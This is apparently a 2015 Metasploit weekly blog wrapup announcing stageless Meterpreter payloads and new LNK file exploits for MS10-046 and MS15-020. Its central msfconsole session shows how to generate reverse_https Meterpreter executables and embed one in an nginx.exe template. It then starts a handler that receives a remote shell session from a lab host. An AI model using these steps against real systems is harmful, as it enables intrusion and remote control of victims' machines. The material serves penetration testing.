Weekly Metasploit Wrapup: Stageless Meterpreter and the Revenge of Stuxnet

Last updated at Thu, 20 Jul 2017 20:08:09 GMT

Stageless Meterpreter

Remember the Metasploit Pop Quiz we ran about a month back? Well, we got tons of support from you, the Metasploit users, and have been picking out what you want to see and have started turning those wishes into reality. I know HD, Brent, and OJ are working up a much more exhaustive blog post for next week to lay out what's going where and when, but one of the more significant updates to Meterpreter landed last night: Stageless Meterpreter.

You're encouraged to read OJ's detailed overview over on PR 4925 to get the skinny on the latest work, and we'd love to hear back about your experiences with these. Right now, you will have to come up with your own custom executable template for generation, since the .text sections of the new stageless Meterpreter binaries are rather huge. We'll ship some defaults soon, but in the meantime, if you want to kick the tires on these new Meterpreters, you're going to need to hunt down something for yourself. OJ used ImmunityDebuger.exe which sports a 981kb .text section, and I've had success with nginx.exe and its monstrous 2MB .text section (you can pick it up here). Behold:

 # Here's the staged Meterpreter generation: msf exploit(handler) > use payload/windows/meterpreter/reverse_https msf payload(reverse_https) > generate -f /home/todb/templates/met.exe -t exe [*] Writing 73802 bytes to /home/todb/templates/met.exe... # And now for stageless Meterpreter: msf payload(reverse_https) > use payload/windows/meterpreter_reverse_https msf payload(meterpreter_reverse_https) > generate -f /home/todb/templates/smet.exe -t exe [-] Payload generation failed: The .text section for 'template_x86_windows.exe' is too small. Minimum is 779166 bytes, your .text section is 45056 bytes msf payload(meterpreter_reverse_https) > generate -f /home/todb/templates/smet.exe -t exe -x /home/todb/templates/nginx.exe [*] Writing 2745344 bytes to /home/todb/templates/smet.exe... # And here's the stageless version in action: msf payload(meterpreter_reverse_https) > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter_reverse_https payload => windows/meterpreter_reverse_https msf exploit(handler) > show options Module options (exploit/multi/handler):    Name  Current Setting  Required  Description    ----  ---------------  --------  ----------- Payload options (windows/meterpreter_reverse_https):    Name        Current Setting  Required  Description    ----        ---------------  --------  -----------    EXITFUNC    process          yes       Exit technique (accepted: seh, thread, process, none)    EXTENSIONS                   no        Comma-separate list of extensions to load    LHOST       192.168.145.1    yes       The local listener hostname    LPORT       8443             yes       The local listener port Exploit target:    Id  Name    --  ----    0   Wildcard Target msf exploit(handler) > run [*] Started HTTPS reverse handler on https://0.0.0.0:8443/ [*] Starting the payload handler... [*] 192.168.145.129:49162 Request received for /4rGu_y77pjV2MMrmmqOAa/... [*] Incoming orphaned or stageless session 4rGu_y77pjV2MMrmmqOAa, attaching... [*] Meterpreter session 1 opened (192.168.145.1:8443 -> 192.168.145.129:49162) at 2015-03-20 12:30:16 -0500 meterpreter > 

So, if you're fine with a much larger file size, these stageless Metepreters should come in pretty handy. There's quite a few upsides to this technique, but I don't want to give away any spoilers there quite yet - stay tuned!

New Modules

Since the last Wrapup, we have lots of new exploit goodness -- a total of nine new exploit modules and two new auxiliary modules have landed in the last 10 days or so.

Of special interest is the fact that the ghost of Stuxnet is back, with the two new LNK file format code exec exploits. We now have an exploit for Classic Stuxnet (MS10-046) and one for the New Stuxnet (MS15-020). Our own Juan Vazquez has also put together a really nice howto on the original pull request for these modules, PR 4911. For more backstory on this bug, see the Krebs On Security post. Finally, keep in mind that there's no publicly available patch for Windows XP for this; using this technique should get you privileged access on any XP device pretty much in perpetuity. Since XP still accounts for nearly 20% of desktop market share, that's kind of a huge bummer for defenders.

As usual, you can check out the release notes for the latest released version of Metasploit, lovingly prepared by Thao.